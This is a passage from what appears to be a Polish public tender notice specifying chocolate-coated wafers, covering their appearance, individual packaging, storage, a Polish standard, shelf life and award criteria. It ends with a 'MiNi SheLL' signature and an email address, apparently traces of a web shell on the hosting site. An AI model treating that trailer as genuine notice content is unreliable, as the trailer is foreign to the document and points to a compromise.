4.1	kształt prostopadłościan,
4.2	barwa: powierzchnia brązowa,
4.3	środek warstwowy, równomierny, listki wafli przylegające do nadzienia, z zewnątrz pokrywa czekoladowa,
4.4	pokrywa czekoladowej twarda w temp. do 20oC.
5	Wymagania dotyczące opakowania:
5.1	każda wafel  musi być pakowany osobno, opakowanie musi chronić produkt przed ciepłem, wilgocią lub innymi szkodliwymi czynnikami,
6		opakowanie nie może być opakowaniem okolicznościowym lub świątecznym (na przykład bożonarodzeniowym, wielkanocnym, walentynkowym etc.).
7	Warunki przechowywania - miejsce suche i chłodne temp. do 180C.
8	Oferowana czekolada musi posiadać niezbędne świadectwa dopuszczenia do obrotu w Polsce zgodnie z obowiązującymi przepisami w tym spełniać wymagania określone w normie PN-A-88120:2000 Wyroby ciastkarskie czekoladowane, w masie czekoladopodobnej i polewie kakaowej.
9	Okres przydatności do spożycia  - co najmniej 9 miesięcy od daty dostarczenia produktu do magazynu Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com